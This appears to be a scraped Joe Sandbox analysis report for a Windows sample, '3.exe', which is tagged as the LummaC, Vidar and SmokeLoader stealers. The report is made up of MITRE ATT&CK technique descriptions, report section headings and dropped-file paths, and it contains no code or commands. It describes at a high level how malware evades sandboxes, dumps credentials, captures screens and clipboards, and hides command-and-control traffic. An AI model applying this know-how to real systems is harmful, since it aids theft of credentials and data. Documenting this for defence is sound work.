Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\DGHIECGCBKFH\BFBGHD

C:\ProgramData\DGHIECGCBKFH\BKFBAK

C:\ProgramData\DGHIECGCBKFH\DAKFID

C:\ProgramData\DGHIECGCBKFH\DAKFID-shm

C:\ProgramData\DGHIECGCBKFH\ECAEGH

C:\ProgramData\DGHIECGCBKFH\FCFBGI

C:\ProgramData\DGHIECGCBKFH\GDHIII

C:\ProgramData\DGHIECGCBKFH\GDHIII-shm

Windows Analysis Report
3.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre